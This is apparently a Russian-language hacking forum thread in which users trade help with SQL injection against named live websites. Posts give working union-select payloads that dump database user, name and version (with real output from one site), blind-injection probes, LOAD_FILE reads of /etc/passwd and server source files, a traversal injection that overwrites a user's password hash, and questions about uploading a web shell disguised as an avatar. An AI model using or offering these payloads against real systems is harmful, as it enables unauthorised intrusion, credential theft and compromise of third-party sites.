+and+substring(version(),1,1)=5 +and+substring(version(),1,1)=4 +and+substring(version(),1,1)=3 Если четвёртая или третяя не стоит заморачиваться, ИМХО.
Ды посимвольным это уже вообще конечный вариант. думал, может есть ещё способы!? ладно, будем др*читься посимвольвно
Нашел на античате шелл спрятанный под картинку Есть система Slaed 3.5 и пару юзеров. Как можно загрузить шелл через загрузку аватар? Как выполнять команды в этом случае?
"Как можно загрузить шелл через загрузку аватар?" - Аплоадом=) Если он в нужном расширении. "Как выполнять команды в этом случае?" - Уже по сути никак. Апачей таких не осталось почти. А способ с шеллом в картинке используется для локальных инклудов.
попробуй -42222 поставить, или убрать кавычку.. вполне есть вариант что у твоего юзера mysql нету доступа к базе information_schema
AFoST Ты уверен, что там именно 3 поля? Скинул бы ссылку, было б легче разобраться.Или хотя б ошибку опиши. Мне кажется, что для посимвольного перебора ещё слишком рано, но тем не менее, ответ на твой вопрос http://www.securitylab.ru/contest/212099.php И в information_schema ты рано полез ))
там на самом деле 32 поля. но писать их тут долго) а вот с ошибкой там хз че. короче 2 варианта. либо белый экран, либо пишет что страница не найдена и выдает несколько символов из какого-то хеша в левой части экрана =\ ссылку пока не дам
AFoST Если скуль слепая, то либо перебор с подзапросами, либо ищи дыру в других параметрах. А вообще , если хочешь , кинь линк в ПМ , посмотрю
такс) прошлую проблему решил. теперь столкнулся с другой. вывожу на экран через мускул файл LOAD_FILE('/etc/passwd/logs/access.log') всё прекрасно работает. выводятся все записи и тд. в логах нашёл раскрытие путей и вывожу файл допустим такой LOAD_FILE('/home/www/name/name.ru/bla-bla/header.php') на что мне выводится на экран лишь часть аписанного в файле, примерно следующего содержания: кусок кода страницы без скул-запроса: кусок кода страницы с скул-запросом: Кусок файла выводится на экран и всё...я так подозреваю, что ф-ция LOAD_FILE встречает какой-то символ и начинает некорректно обрабатывать содержимое файла... вопрос. как вывести всё содержимое файла?
возможно в поле ограничено кол-во символов попробуй другие поля и вообще для чтения файлов юзай Sipt 4 имхо намного удобней
народ, поможите _http://www.nailshop.ee/emall/detail.php?prodid=-1+order+by+5,2/* из запроса ясно, что таблиц всего 5. Но тут вылезает проблема ни к месту "The used SELECT statements have a different number of columns" при запросе: _http://www.nailshop.ee/emall/detail.php?prodid=-1+union+select+concat_ws(0x3a,database(),user(),version()),2,3,4,5/**/ как такое может быть??? Вксь мозг поломал уже
zjuk@ http://www.nailshop.ee/emall/detail.php?prodid=1+and+1=2+union+select+1,2,3,concat_ws(0x3a,User(),Database(),Version()),5,6,7,8,9,0,1,2,3,4,5,6,7/* Вывод в коде : nailshop@localhost:nailshop_eMall:5.0.45-log
доброго времени суток всем, подскажите, где подвох: _http://datagate.ee/index.php?ln=rus&mid=-1+order+by+7,2/**/ из этого ясно, что полей 7, так как значения выше семи ругаются на несоответствие числа столбцов. Однако: _http://datagate.ee/index.php?ln=rus&mid=1+and+1=2+union+select+userid,2,user,useremail,userpassword,username,7+from+users/**/ снова ругается на кол-во столбцов, в чём же дело??? объясните пожалуйста
не, с тем сайтом (nailshop.ee) я разобрался уже, спасибо. А тут уже другой сайт (datagate.ee) и случай вроде совсем не похожий, подскажите как с ним быть
проблемка с инъекцией: описание: нету выводимых полей (это не проблема) к тому же локальный "инклуд" средствами copy(), по запрсу видно, что ОС винда проблема заключается в объединение запросов sql, можно ли объеденить с запросом INTO OUTFILE ? Code: gallery.php?speichern=../../../../../../../../../../../../boot.ini', user_password='d41d8cd98f00b204e9800998ecf8427e' WHERE user_id=84 +--+